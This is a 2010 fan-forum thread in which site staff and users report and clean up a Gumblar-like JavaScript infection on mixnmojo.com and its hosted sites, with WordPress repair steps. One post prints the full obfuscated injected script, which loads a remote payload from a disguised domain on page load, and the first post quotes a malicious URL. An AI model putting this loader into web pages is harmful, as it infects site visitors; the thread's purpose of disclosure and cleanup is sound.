lfnetwork.com mark read register faq members calendar

Thread: Mojo malware infection?
Thread Tools Display Modes
Post a new thread. Add a reply to this thread. Indicate all threads in this forum as read. Subscribe to this forum. RSS feed: this forum RSS feed: all forums
Old 03-03-2010, 12:41 PM   #1
Harald B
Rookie
 
Harald B's Avatar
 
Join Date: Jun 2009
Posts: 52
Exclamation Mojo malware infection?

Since this morning each time I try go to mixnmojo.com AVG warns me that its blocking a connection to a very dubious link; they vary slightly, with the following being a good example
Code:
winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php
(warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it.
Sorry if I should have posted this somewhere else. I'm not sure where that would be.

edit:I've got two more relevant details. Only the main site and Behind cause trouble, deeper links (blog comments, game database etc) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

Last edited by Harald B; 03-03-2010 at 12:53 PM. Reason: more info
Harald B is offline   you may: quote & reply,
Old 03-03-2010, 02:34 PM   #2
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does.

I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it.

Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.
Gabez is offline   you may: quote & reply,
Old 03-03-2010, 03:09 PM   #3
elTee
beatnik
 
elTee's Avatar
 
Status: Super Moderator
Join Date: Dec 2001
Location: Cheltenham, England
Posts: 2,921
The International House of Mojo Staff LFN Staff Member 
Heh yes, I changed the EMI score from 4 skulls to 2 for a joke, but then the goddamn thing kept reseting itself to 2 again. Remi was up all night changing it back


LucasTones - LT - elTee
The International House of Mojo - writing long-winded gibberish increasingly infrequently
elTee is offline   you may: quote & reply,
Old 03-04-2010, 07:03 AM   #4
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
It has begun: http://poisonpen.mixnmojo.com/ and http://pumpkinpost.mixnmojo.com/ have now been infected by Mojo 9's seriously dated and ageing code.

It's Chernobyl all over again.
Gabez is offline   you may: quote & reply,
Old 03-04-2010, 08:51 AM   #5
Haggis
Mojorator
 
Haggis's Avatar
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

Haggis is offline   you may: quote & reply,
Old 03-04-2010, 02:58 PM   #6
bgbennyboy
Festively Plump
 
bgbennyboy's Avatar
 
Status: Super Moderator
Join Date: Feb 2002
Location: England
Posts: 2,000
LFN Staff Member 
Looks like its probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but its tried to copy itself to all index.php pages it seems.

Most of the *index php files on my site got a script appended to the end, it even snuck its way into my Wordpress theme files too. Any site that's using Wordpress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

bgbennyboy is offline   you may: quote & reply,
Old 03-04-2010, 04:41 PM   #7
Harald B
Rookie
 
Harald B's Avatar
 
Join Date: Jun 2009
Posts: 52
Heads-up:I'm now also getting it when at the comments sections for individual blog posts and in the game database (ie it's spread to showfile.php and gamedb.php, presumably).

edit:Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good

Last edited by Harald B; 03-05-2010 at 12:51 PM. Reason: meh
Harald B is offline   you may: quote & reply,
Old 03-04-2010, 04:45 PM   #8
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
The infection is spreading!!!!

DO NOT PANIC.
Gabez is offline   you may: quote & reply,
Old 03-04-2010, 05:38 PM   #9
jp-30
 
jp-30's Avatar
 
Join Date: Apr 2002
Location: New Zealand
Posts: 968
The International House of Mojo Staff 
If only we had started building Mojo 10.
jp-30 is offline   you may: quote & reply,
Old 03-04-2010, 10:50 PM   #10
DJG
Bot of the Year
 
DJG's Avatar
 
Join Date: Jul 2001
Posts: 71
Don't blame the code.

Damn kids.


DJG
The International House of Mojo
www.mixnmojo.com
DJG is offline   you may: quote & reply,
Old 03-05-2010, 12:46 AM   #11
Valkian
Loves Razputin.net!
 
Valkian's Avatar
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
I hate to say this Gabez... but I'M IN PANIC!!!
Both The Dig Museum and The Thrillville Quarterly are under attack!!

Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

Valkian is offline   you may: quote & reply,
Old 03-05-2010, 01:08 AM   #12
MJ
Lemonade
 
MJ's Avatar
 
Join Date: Dec 2001
Location: Santa Difunta
Posts: 1,137
LFN Staff Member 
Nightlight appears to be fine. Heh, not even a virus can be arsed to pay attention to it.


Want some funny radio plays?
Nightlight Productions
All Night Long
MJ is offline   you may: quote & reply,
Old 03-05-2010, 03:23 AM   #13
QueZTone
mind il creativo
 
QueZTone's Avatar
 
Join Date: Dec 2001
Location: The Netherlands
Posts: 779
haha DJG came out of hiding after all those years! my plan worked!


but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement i think?

QueZTone is offline   you may: quote & reply,
Old 03-05-2010, 04:18 AM   #14
Harald B
Rookie
 
Harald B's Avatar
 
Join Date: Jun 2009
Posts: 52
Quote:
Originally Posted by QueZTone View Post
but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement i think?
Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.
Harald B is offline   you may: quote & reply,
Old 03-05-2010, 06:37 AM   #15
diduz
 
diduz's Avatar
 
Join Date: Jul 2003
Location: Italy
Posts: 50
Guys, the malware has attacked my laptop and I've been battling to save my system!!!

I won't go back to the site until it's safe again (I'm writing from another PC right now).

It seems to be some sort of fake virus alert.
diduz is offline   you may: quote & reply,
Old 03-05-2010, 02:05 PM   #16
Icebox
Rookie
 
Icebox's Avatar
 
Join Date: Dec 2008
Location: The Potato Barn
Posts: 72
Current Game: Monkey Man Country
Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing.

I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.


Let's Kick Some ICE!
Icebox is offline   you may: quote & reply,
Old 03-05-2010, 02:16 PM   #17
bgbennyboy
Festively Plump
 
bgbennyboy's Avatar
 
Status: Super Moderator
Join Date: Feb 2002
Location: England
Posts: 2,000
LFN Staff Member 
For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:
  • Delete the wp-admin and wp-includes folders
  • Download wordpress again and reupload all the files, overwriting those that were there
  • Edit the wp-config.php and index.php files to remove the virus code from the footer
  • Look in the themes in wp-content and remove the code from the footers in the php files
  • None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.

This is the code that was appended to my files:
Code:
<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

bgbennyboy is offline   you may: quote & reply,
Old 03-05-2010, 02:28 PM   #18
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Oh my, DJG! Now I know that it's the end of days.

Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/
Gabez is offline   you may: quote & reply,
Old 03-05-2010, 03:14 PM   #19
daltysmilth
Rookie
 
daltysmilth's Avatar
 
Join Date: Jan 2004
Location: On a specific landmass
Posts: 225
If, God forbid, the whole site goes down, is there anyplace we could go to see what the status is to getting it back up again?


"So Brak, is that Polish? Or... no I suppose it wouldn't be."
--Mike Nelson- MST3K: the Movie
daltysmilth is offline   you may: quote & reply,
Old 03-05-2010, 03:20 PM   #20
Harald B
Rookie
 
Harald B's Avatar
 
Join Date: Jun 2009
Posts: 52
Right here, probably. LucasForums is sufficiently distinct from Mojo that it should stay fine.
Harald B is offline   you may: quote & reply,
Old 03-05-2010, 03:24 PM   #21
Valkian
Loves Razputin.net!
 
Valkian's Avatar
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
I was actually thinking of Gabez' place. That would be the ultimate shelter for us in times of desperation.

Valkian is offline   you may: quote & reply,
Old 03-05-2010, 03:29 PM   #22
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
None of you are allowed in my panic shelter >:
Gabez is offline   you may: quote & reply,
Old 03-05-2010, 03:53 PM   #23
elTee
beatnik
 
elTee's Avatar
 
Status: Super Moderator
Join Date: Dec 2001
Location: Cheltenham, England
Posts: 2,921
The International House of Mojo Staff LFN Staff Member 
Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.


LucasTones - LT - elTee
The International House of Mojo - writing long-winded gibberish increasingly infrequently
elTee is offline   you may: quote & reply,
Old 03-05-2010, 10:14 PM   #24
MJ
Lemonade
 
MJ's Avatar
 
Join Date: Dec 2001
Location: Santa Difunta
Posts: 1,137
LFN Staff Member 
I've checked Nightlight's code, and it seems to be fine. It's on Wordpress, but as a coincidence I updated it to the latest version about five days ago.


Want some funny radio plays?
Nightlight Productions
All Night Long
MJ is offline   you may: quote & reply,
Old 03-06-2010, 05:02 AM   #25
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Yeah, but Nighlight is on the Grim Fandango.net part of the server, so I don't think it would be affected anyway.

But it never hurts to make sure!
Gabez is offline   you may: quote & reply,
Old 03-06-2010, 10:40 AM   #26
Serge
SCUMMLord
 
Join Date: Mar 2002
Location: Denmark
Posts: 196
HighLand is infected too - and it certainly doesn't run on Wordpress - not sure Wordpress even existed when that site was made. Predates lowercase HTML too ;-)

And I don't remember the FTP account (as usual), so... :P
Serge is offline   you may: quote & reply,
Old 03-06-2010, 11:26 AM   #27
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Don't worry Serge, we'll fix it.
Gabez is offline   you may: quote & reply,
Old 03-06-2010, 11:28 AM   #28
s-island
Music man
 
s-island's Avatar
 
Status: Administrator
Join Date: Sep 2003
Posts: 1,089
The International House of Mojo Staff 
It's gone from Highland now. It infects all index*.php/html, default*.php/html and all JS files so all sites have at least one infected file.
s-island is offline   you may: quote & reply,
Old 03-08-2010, 08:48 AM   #29
Haggis
Mojorator
 
Haggis's Avatar
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
I'm getting strange pop-ups on the World of MI forums, but I can't see any files that have been infected. Maybe you guys can take a look at it, and also at World of MI itself, which I don't have access to?

Haggis is offline   you may: quote & reply,
Old 03-08-2010, 09:34 AM   #30
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.

But we'll get our best people on the case anyway.

Let us pray that the infection does not spread any further...
Gabez is offline   you may: quote & reply,
Old 03-08-2010, 02:03 PM   #31
Valkian
Loves Razputin.net!
 
Valkian's Avatar
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
Well, it seems that the Thrillville Quarterly and The Dig Museum are now both clear, thanks to my relentless efforts at containing the infection.
I know many of you were worried about that.

Valkian is offline   you may: quote & reply,
Old 03-08-2010, 03:51 PM   #32
Haggis
Mojorator
 
Haggis's Avatar
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
Quote:
Originally Posted by Gabez View Post
Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.
Or disgruntled fans are attacking the site because WMI sold out...

Quote:
But we'll get our best people on the case anyway.
Thanks!

Haggis is offline   you may: quote & reply,
Old 03-08-2010, 05:14 PM   #33
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...
Gabez is offline   you may: quote & reply,
Old 03-08-2010, 06:03 PM   #34
Valkian
Loves Razputin.net!
 
Valkian's Avatar
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
Oh, wait a minute, I thought Zaarin was Zaarin and now it turns out he is actually s-island? No wonder Zaarin never replied when I thanked him for something, he was the wrong Zaarin!
I would appreciate if there was some sort of press release explaining this things so I don't make myself look like a fool in the future (or rather, not any more than I already do).

Valkian is offline   you may: quote & reply,
Old 03-13-2010, 08:16 AM   #35
Haggis
Mojorator
 
Haggis's Avatar
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
Quote:
Originally Posted by Gabez View Post
Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...
Sorry for the late reply, I've been offline due to sickness... the popups are being reported by several forum members, so they're not just on my end I'm afraid. I also recently updated the forum software when the latest version of phpBB came out, which was after the popup problem started appearing, but that didn't fix it. Perhaps I should try a clean install of phpBB, see if that will fix it.

Haggis is offline   you may: quote & reply,
Old 03-13-2010, 10:46 AM   #36
s-island
Music man
 
s-island's Avatar
 
Status: Administrator
Join Date: Sep 2003
Posts: 1,089
The International House of Mojo Staff 
I've run some scripts on all of Mojo's files that removes the javascript malware so things should be clean now. However, some JS files and probably some PHP/HTML files as well may have lost content. I know that Wordpress' PHP files have had the last ?> removed by the virus and some JS files have been completely emptied.
s-island is offline   you may: quote & reply,
Old 03-30-2010, 08:36 AM   #37
Maratanos
Lurker
 
Join Date: Nov 2008
Posts: 6
Hey, uh, guys? Was it your intention to send out an RSS feed item entitled "MOJO SUX" with a body linking to someplace that looks an awful lot like a spam site for pharmaceuticals?

EDIT: confirmed from a linux computer that there is a newspost too.

Last edited by Maratanos; 03-30-2010 at 08:42 AM.
Maratanos is offline   you may: quote & reply,
Old 03-30-2010, 08:52 AM   #38
Gabez
Senior Member
 
Gabez's Avatar
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Sorry about that, as far as I know it was just a news post that was added by someone (not anyone authorised), but it's gone now and we'll reset the passwords for everything tonight, srry again about this but we're working on the situation.
Gabez is offline   you may: quote & reply,
Old 03-30-2010, 12:36 PM   #39
Jeff
Rating: Awesome
 
Jeff's Avatar
 
Status: Administrator
Join Date: Jan 2005
Location: Chicago, IL, USA
Posts: 8,434
Current Game: SWTOR
Imperialist Meatbags Guild Officer The Walking Carpets Guild Officer Notable contributor LFN Staff Member 
Anyone receiving a trojan warning when they enter this thread? Odd that it is thread-specific but I just received two warnings in a row in this thread. Also, the ads aren't loading in this thread.


Follow me on Twitter
Follow StarWarsMMO.net on Twitter | Like us on Facebook
Jeff is offline   you may: quote & reply,
Old 03-30-2010, 02:06 PM   #40
Kroms
Moose fell on my head
 
Kroms's Avatar
 
Join Date: Jun 2007
Posts: 697
Mojown'd I'm going to miss this site, when it finally hits the ****ter.
Kroms is offline   you may: quote & reply,
Post a new thread. Add a reply to this thread. Indicate all threads in this forum as read. Subscribe to this forum. RSS feed: this forum RSS feed: all forums
Go Back   LucasForums > Network > Mixnmojo.com > Mojo Discussion Forums > General Discussion > Mojo malware infection?

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 02:53 PM.


LFNetwork, LLC ©2002-2011 - All rights reserved.
Powered by vBulletin®
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.